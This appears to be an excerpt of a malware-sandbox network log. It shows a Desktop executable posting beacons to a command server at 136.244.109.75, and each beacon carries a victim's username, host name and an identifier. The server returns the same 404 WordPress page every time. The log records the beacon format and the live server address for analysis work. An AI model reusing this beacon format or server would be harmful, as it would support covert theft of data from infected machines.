6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:43.027591944 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:43.027694941 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:43.027735949 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:43.027781010 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:43.027822971 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:43.027859926 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:43.027896881 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:43.027937889 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:43.027981997 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49787	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:43.385034084 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:43.593564987 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:44.557317972 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:44.557375908 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:44.557411909 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:44.557447910 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:44.557486057 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:44.557532072 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:44.557576895 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:44.557615042 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:44.557652950 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:44.557689905 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49788	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:44.899677992 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:45.109710932 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:46.054307938 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:44 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 